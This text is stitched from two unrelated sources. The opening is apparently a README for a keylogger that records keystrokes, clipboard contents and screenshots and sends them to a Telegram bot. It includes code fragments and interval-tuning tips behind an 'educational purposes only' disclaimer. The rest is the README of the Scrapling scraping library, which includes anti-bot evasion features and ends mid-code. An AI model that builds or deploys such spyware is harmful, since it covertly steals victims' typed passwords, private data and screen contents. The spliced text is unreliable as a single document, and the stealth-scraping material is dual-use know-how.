: In case of errors, logs them in an errors_log.txt file.
This module contains auxiliary functions that assist the overall operation of the tool.
log_error()
: Logs any errors in errors_log.txt with a date and time format.
get_clipboard_content()
: Captures the current content of the clipboard.
capture_screenshot()
: Takes a screenshot and temporarily saves it to send it to the Telegram bot.
This module handles keylogging, clipboard monitoring, and screenshot captures.
capture_keystrokes(bot)
: Asynchronous function that captures keystrokes and sends the information to the Telegram bot.
send_keystrokes_to_telegram(bot)
: This function sends the accumulated keystrokes to the bot.
capture_screenshots(bot)
: Periodically captures an image of the screen and sends it to the bot.
log_clipboard(bot)
: Sends the contents of the clipboard to the bot.
Change the capture and information sending time interval.
async def send_keystrokes_to_telegram(bot):
global keystroke_buffer
while True:
await asyncio.sleep(1) # Change the key sending interval
async def capture_screenshots(bot):
while True:
await asyncio.sleep(30) # Change the screenshot capture interval
try:
async def log_clipboard(bot):
previous_content = ""
while True:
await asyncio.sleep(5) # Change the interval to check for clipboard changes
current_content = get_clipboard_content()
This project is for educational purposes only and for security testing in your own environments or with express authorization. Unauthorized use of this tool may violate local laws and privacy policies.
Contributions are welcome. Please ensure to respect the code of conduct when collaborating.
This project is licensed under the MIT License.
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.
Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.
>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!
`Fetcher` class.
`PlayWrightFetcher` class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
`StealthyFetcher` and `PlayWrightFetcher` classes.

from scrapling.fetchers import Fetcher
fetcher = Fetcher(auto_match=False)
# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))
# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above
# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]
# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...
# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)
To keep it simple, all methods can be chained on top of each other!
Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.
# | Library | Time (ms) | vs Scrapling |
---|---|---|---|
1 | Scrapling | 5.44 | 1.0x |
2 | Parsel/Scrapy | 5.53 | 1.017x |
3 | Raw Lxml | 6.76 | 1.243x |
4 | PyQuery | 21.96 | 4.037x |
5 | Selectolax | 67.12 | 12.338x |
6 | BS4 with Lxml | 1307.03 | 240.263x |
7 | MechanicalSoup | 1322.64 | 243.132x |
8 | BS4 with html5lib | 3373.75 | 620.175x |
As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.
Library | Time (ms) | vs Scrapling |
---|---|---|
Scrapling | 2.51 | 1.0x |
AutoScraper | 11.41 | 4.546x |
Scrapling can find elements with more methods and it returns full element `Adaptor` objects, not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.
All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
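The averaging and the "vs Scrapling" column can be sketched with the standard library alone. This is not the project's benchmarks.py; `average_ms`, `relative_to`, and `sample_task` are hypothetical names, and only the ratio arithmetic is taken from the tables above.

```python
import timeit


def average_ms(func, runs=100):
    """Return the mean wall-clock time of func() in milliseconds over `runs` calls."""
    total_seconds = timeit.timeit(func, number=runs)
    return total_seconds / runs * 1000


def relative_to(baseline_ms, other_ms):
    """Express a timing as a multiple of the baseline, rounded to three decimals."""
    return round(other_ms / baseline_ms, 3)


def sample_task():
    """Hypothetical workload standing in for a parsing task."""
    return sorted(str(i) for i in range(1000))


elapsed = average_ms(sample_task)
print(f"sample_task: {elapsed:.3f} ms per run")

# Recompute two ratios from the timings published in the tables.
print(relative_to(5.44, 5.53))   # Parsel/Scrapy relative to Scrapling
print(relative_to(2.51, 11.41))  # AutoScraper relative to Scrapling
```

Averaging over many runs smooths out scheduler noise, which matters when the gap between two libraries is only a few percent.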
Scrapling is a breeze to get started with. Starting from version 0.2.9, it requires at least Python 3.9.
pip3 install scrapling
Then run this command to install browsers' dependencies needed to use Fetcher classes
scrapling install
If you have any installation issues, please open an issue.
Fetchers are interfaces built on top of other libraries with added features. They make requests or fetch pages for you in a single call and then return an `Adaptor` object. This feature was introduced because the only option before was to fetch the page however you wanted, then pass it manually to the `Adaptor` class to create an `Adaptor` instance and start playing around with the page.
You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way
from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher
All of them can take these initialization arguments: `auto_match`, `huge_tree`, `keep_comments`, `keep_cdata`, `storage`, and `storage_args`, which are the same ones you give to the `Adaptor` class.
If you don't want to pass arguments to the generated `Adaptor` object and want to use the default values, you can use this import instead for cleaner code:
from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
then use it right away without initializing like:
page = StealthyFetcher.fetch('https://example.com')
Also, the `Response` object returned from all fetchers is the same as the `Adaptor` object except it has these added attributes: `status`, `reason`, `cookies`, `headers`, `history`, and `request_headers`. The `cookies`, `headers`, and `request_headers` attributes are always dictionaries.
[!NOTE] The `auto_match` argument is enabled by default, and it is the one you should care about the most, as you will see later.
This class is built on top of httpx with additional configuration options. Here you can do `GET`, `POST`, `PUT`, and `DELETE` requests.
For all methods, you have `stealthy_headers`, which makes `Fetcher` create and use a real browser's headers, then create a referer header as if the request came from a Google search of the URL's domain. It's enabled by default. You can also set the number of retries with the `retries` argument for all methods, which makes httpx retry a request if it fails for any reason. The default number of retries for all `Fetcher` methods is 3.
Note: All headers generated by the `stealthy_headers` argument can be overwritten through the `headers` argument.
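The header override and retry behavior described above can be pictured with a small standard-library sketch. It is not Scrapling's implementation: `build_headers` and `with_retries` are hypothetical helpers, the header values and the exact referer format are placeholders, and treating `retries` as the total number of attempts is an assumption.

```python
from urllib.parse import urlsplit


def build_headers(url, stealthy_headers=True, headers=None):
    """Merge generated browser-like headers with caller-supplied overrides."""
    generated = {}
    if stealthy_headers:
        domain = urlsplit(url).netloc
        generated = {
            # Placeholder values; a real implementation would generate these.
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) ExampleBrowser/1.0",
            # Assumed format for a "Google search of this domain" referer.
            "Referer": f"https://www.google.com/search?q={domain}",
        }
    # Caller-supplied headers win over generated ones.
    return {**generated, **(headers or {})}


def with_retries(request, retries=3):
    """Call request() until it succeeds or `retries` attempts have failed."""
    if retries < 1:
        raise ValueError("retries must be at least 1")
    last_error = None
    for _ in range(retries):
        try:
            return request()
        except Exception as error:  # deliberately broad for the sketch
            last_error = error
    raise last_error


merged = build_headers(
    "https://httpbin.org/get",
    headers={"Referer": "https://example.com/"},
)
print(merged["Referer"])  # the caller's value replaces the generated one
```

Merging the caller's dictionary last is what makes the override rule in the note above fall out naturally.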
You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030
>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
For Async requests, you will just replace the import like below:
>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.
>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection') # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.
>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
Using this Fetcher class, you can make requests with:
1. Vanilla Playwright without any modifications other than the ones you chose.
2. Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include:
   * Patching the CDP runtime fingerprint.
   * Mimicking some of the real browsers' properties by injecting several JS files and using custom options.
   * Using custom flags on launch to hide Playwright even more and make it faster.
   * Generating a real browser's headers of the same type and same user OS, then appending them to the request's headers.
3. Real browsers by passing the `real_chrome` argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled on it.
4. NSTBrowser's docker browserless option by passing the CDP URL and enabling the `nstbrowser_mode` option.
Note: Using the `real_chrome` argument requires that you have the Chrome browser installed on your device.
Add that to a lot of controlling/hiding options as you will see in the arguments list below.
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
>>> quote.tag
'div'
>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>
>>> quote.parent.tag
'div'
>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]
>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>
>>> quote.children.css_first(".author::text")
'Albert Einstein'
>>> quote.has_class('quote')
True
# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'
# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'
If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below
for ancestor in quote.iterancestors():
    # do something with it...
You can search for a specific ancestor of an element that satisfies a function. All you need to do is pass a function that takes an `Adaptor` object as an argument and returns `True` if the condition is satisfied or `False` otherwise, like below:
>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>
You can select elements by their text content in multiple ways, here's a full example on another website:
>>> page = Fetcher().get('https://books.toscrape.com/index.html')
>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>
>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'
>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.find_by_regex(r'£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>
>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]
Find all elements that are similar to the current element in location and attributes
# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]
# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19
# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]
To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason
>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
    print({
        "name": product.css_first('h3 a::text'),
        "price": product.css_first('.price_color').re_first(r'[\d\.]+'),
        "stock": product.css('.availability::text')[-1].clean()
    })
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...
The documentation will provide more advanced examples.
Let's say you are scraping a page with a structure like this:
<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>
And you want to scrape the first product, the one with the `p1` ID. You will probably write a selector like this
page.css('#p1')
When website owners implement structural changes like
<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>
The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.
from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)
if not element:  # One day website changes?
    element = page.css('#p1', auto_match=True)  # Scrapling still finds it!
# the rest of the code...
How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.
Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.
To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of Stack Overflow's website in 2010, pretty old huh? Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)
If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a
This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions
>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
...     print('Scrapling found the same element in the old design and the new design!')
Scrapling found the same element in the old design and the new design!
Note that I used a new argument called `automatch_domain`. This is because, to Scrapling, these are two different URLs rather than one website, so it isolates their data. To tell Scrapling they are the same website, we pass the domain we want to use for saving auto-match data for both, so Scrapling doesn't isolate them.
In a real-world scenario, the code will be the same except it will use the same URL for both requests, so you won't need the `automatch_domain` argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)
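To picture why the two URLs are isolated from each other, here is a toy in-memory store keyed by domain and identifier. It is only an illustration of the idea: `ElementStore` and its methods are hypothetical and do not reflect how Scrapling's storage is written.

```python
from urllib.parse import urlsplit


class ElementStore:
    """Toy store that files saved element properties under (domain, identifier)."""

    def __init__(self):
        self._data = {}

    @staticmethod
    def _domain(url, automatch_domain=None):
        # An explicit domain overrides whatever the URL itself contains.
        return automatch_domain or urlsplit(url).netloc

    def save(self, url, identifier, properties, automatch_domain=None):
        key = (self._domain(url, automatch_domain), identifier)
        self._data[key] = properties

    def retrieve(self, url, identifier, automatch_domain=None):
        key = (self._domain(url, automatch_domain), identifier)
        return self._data.get(key)


old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
new_url = "https://stackoverflow.com/"
selector = "#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a"

store = ElementStore()

# Without a shared domain, data saved for the archive URL is invisible to the live URL.
store.save(old_url, selector, {"tag": "a", "text": "Questions"})
print(store.retrieve(new_url, selector))  # None

# With a shared domain, both URLs read and write the same record.
store.save(old_url, selector, {"tag": "a", "text": "Questions"}, automatch_domain="stackoverflow.com")
print(store.retrieve(new_url, selector, automatch_domain="stackoverflow.com"))
```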
Notes:
1. For the two examples above, I used the `Adaptor` class once and the `Fetcher` class once, just to show that you can create the `Adaptor` object yourself if you have the source, or fetch the source using any `Fetcher` class, which creates the `Adaptor` object for you.
2. Passing the `auto_save` argument with the `auto_match` argument set to `False` while initializing the Adaptor/Fetcher object will only result in ignoring the `auto_save` argument value and the following warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. The same applies to the `auto_match` argument.
3. The `auto_match` parameter works only for `Adaptor` instances, not `Adaptors`, so if you do something like `page.css('body').css('#p1', auto_match=True)` you will get an error because you can't auto-match a whole list. You have to be specific and do something like `page.css_first('body').css('#p1', auto_match=True)`.
Inspired by BeautifulSoup's `find_all` function, you can find elements using the `find_all`/`find` methods. Both methods can take multiple types of filters and return all elements in the page that all these filters apply to.
So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:
Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.
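The waterfall idea can be sketched with plain dictionaries standing in for elements. The function below is a hypothetical stand-in, not Scrapling's `find_all`, and the layer order it uses (tag names, then attributes, then a regex on the text, then functions) is an assumption made for illustration.

```python
import re


def find_all(elements, tags=None, attributes=None, pattern=None, functions=()):
    """Filter dict-based elements layer by layer; each layer narrows the previous result."""
    results = list(elements)
    if tags:
        results = [e for e in results if e["tag"] in tags]
    if attributes:
        results = [
            e for e in results
            if all(e["attrib"].get(key) == value for key, value in attributes.items())
        ]
    if pattern:
        results = [e for e in results if pattern.search(e["text"])]
    for func in functions:
        results = [e for e in results if func(e)]
    return results


elements = [
    {"tag": "div", "attrib": {"class": "quote"}, "text": "The world as we have created it"},
    {"tag": "div", "attrib": {"class": "tags"}, "text": "Tags: change world"},
    {"tag": "span", "attrib": {"class": "text"}, "text": "It is our choices"},
]

matches = find_all(
    elements,
    tags=["div"],
    attributes={"class": "quote"},
    pattern=re.compile(r"world"),
)
print([m["text"] for m in matches])
```

Because every layer only sees what the previous layer kept, skipping a layer (for example passing no tag names) simply starts the waterfall one step later.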
Examples to clear any confusion :)
>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]
# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]
# Find all elements that have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]
# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]
# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]
# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]
Here's what else you can do with Scrapling:
- Accessing the `lxml.etree` object itself of any element directly
>>> quote._root
<Element div at 0x107f98870>
- Saving and retrieving elements manually to auto-match them outside the `css` and the `xpath` methods, but you have to set the identifier yourself.
To save an element to the database:
>>> element = page.find_by_text('Tipping the Velvet', first_match=True)
>>> page.save(element, 'my_special_element')
To retrieve it later and relocate it inside the page:
>>> element_dict = page.retrieve('my_special_element')
>>> page.relocate(element_dict, adaptor_type=True)
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.relocate(element_dict, adaptor_type=True).css('::text')
['Tipping the Velvet']
If you want to keep it as an `lxml.etree` object, leave out the `adaptor_type` argument:
>>> page.relocate(element_dict)
[<Element a at 0x105a2a7b0>]
- Filtering results based on a function
# Find all products over $50
expensive_products = page.css('.product_pod').filter(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
# Find all the products with price '54.23'
page.css('.product_pod').search(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
- Doing operations on element content is the same as Scrapy
quote.re(r'regex_pattern')  # Get all strings (TextHandlers) that match the regex pattern
quote.re_first(r'regex_pattern')  # Get the first string (TextHandler) only
quote.json()  # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options
except that you can do more with them like
quote.re(
    r'regex_pattern',
    replace_entities=True,  # Character entity references are replaced by their corresponding character
    clean_match=True,  # This will ignore all whitespaces and consecutive spaces while matching
    case_sensitive=False,  # Set the regex to ignore letters case while compiling it
)
Note that all of these methods come from the `TextHandler` that contains the text content, so the same can be done directly if you call the `.text` property or an equivalent selector function.
- Doing operations on the text content itself includes
quote.clean()
All strings returned from a regex search are `TextHandler` objects too, so in cases where you have, for example, a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to a JSON object, other libraries would need more than one line of code, but here you can do it in one line like this:
page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
Sort all characters in the string as if it were a list and return the new string:
quote.sort(reverse=False)
To be clear, `TextHandler` is a sub-class of Python's `str`, so all normal operations/methods that work with Python strings will work with it.
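To see why subclassing `str` makes this kind of chaining possible, here is a minimal stand-in. `MiniTextHandler` is hypothetical and far simpler than Scrapling's `TextHandler`; its `clean` behavior (collapsing whitespace) is an assumption, and it uses the standard `json` module rather than `orjson`.

```python
import json
import re


class MiniTextHandler(str):
    """Hypothetical str subclass that adds a few text helpers."""

    def clean(self):
        # Collapse runs of whitespace into single spaces and trim the ends.
        return MiniTextHandler(re.sub(r"\s+", " ", self).strip())

    def re_first(self, pattern):
        # Return the first capture group (or the whole match) as a MiniTextHandler.
        match = re.search(pattern, self)
        if match is None:
            return None
        return MiniTextHandler(match.group(1) if match.groups() else match.group(0))

    def json(self):
        # Parse the string as JSON.
        return json.loads(self)


script = MiniTextHandler('var dataLayer = {"page": "home", "items": 3};')

# The regex result is itself a MiniTextHandler, so .json() can be chained directly.
data = script.re_first(r"var dataLayer = (.+);").json()
print(data["items"])

# Ordinary str methods keep working because the class inherits from str.
print(MiniTextHandler("  In   stock \n").clean().upper())
```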
Any element's attributes are not exactly a dictionary but a sub-class of mapping called `AttributesHandler` that's read-only, so it's faster, and string values returned are actually `TextHandler` objects, so all operations above can be done on them, along with standard dictionary operations that don't modify the data, and more :)
>>> for item in element.attrib.search_values('catalogue', partial=True):
...     print(item)
{'href': 'catalogue/tipping-the-velvet_999/index.html'}
>>> element.attrib.json_string
b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
>>> dict(element.attrib)
{'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}
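A read-only mapping of this kind can be sketched with `collections.abc.Mapping`. The class below is a hypothetical illustration, not Scrapling's `AttributesHandler`; only the `search_values` call shape is borrowed from the example above.

```python
from collections.abc import Mapping


class ReadOnlyAttributes(Mapping):
    """Hypothetical read-only mapping over an element's attributes."""

    def __init__(self, data):
        self._data = dict(data)

    def __getitem__(self, key):
        return self._data[key]

    def __iter__(self):
        return iter(self._data)

    def __len__(self):
        return len(self._data)

    def search_values(self, keyword, partial=False):
        """Yield one-item dicts for attributes whose value matches the keyword."""
        for key, value in self._data.items():
            matched = (keyword in value) if partial else (keyword == value)
            if matched:
                yield {key: value}


attrib = ReadOnlyAttributes({
    "href": "catalogue/tipping-the-velvet_999/index.html",
    "title": "Tipping the Velvet",
})

print(list(attrib.search_values("catalogue", partial=True)))
print(dict(attrib))
```

Since `Mapping` defines no `__setitem__`, an assignment such as `attrib["href"] = "x"` raises `TypeError`, while reads, iteration, `in`, and `dict(...)` all work.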
Scrapling is under active development so expect many more features coming soon :)
There are a lot of deep details skipped here to make this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...
Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.
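As a rough picture of what "inherit from an abstract class and follow the singleton pattern" can look like, here is a generic sketch. Every name in it (`StorageBase`, `MemoryStorage`, `save`, `retrieve`) is hypothetical; the real base class, method names, and rules are defined in Scrapling's docs, not here.

```python
from abc import ABC, abstractmethod


class StorageBase(ABC):
    """Hypothetical abstract interface with one shared instance per concrete class."""

    _instances = {}

    def __new__(cls, *args, **kwargs):
        # Singleton per concrete class: reuse the instance if one already exists.
        if cls not in StorageBase._instances:
            StorageBase._instances[cls] = super().__new__(cls)
        return StorageBase._instances[cls]

    @abstractmethod
    def save(self, identifier, properties): ...

    @abstractmethod
    def retrieve(self, identifier): ...


class MemoryStorage(StorageBase):
    """Toy backend that keeps everything in a dictionary."""

    def __init__(self):
        # __init__ runs on every call, so only create the dict the first time.
        if not hasattr(self, "_items"):
            self._items = {}

    def save(self, identifier, properties):
        self._items[identifier] = properties

    def retrieve(self, identifier):
        return self._items.get(identifier)


first = MemoryStorage()
second = MemoryStorage()
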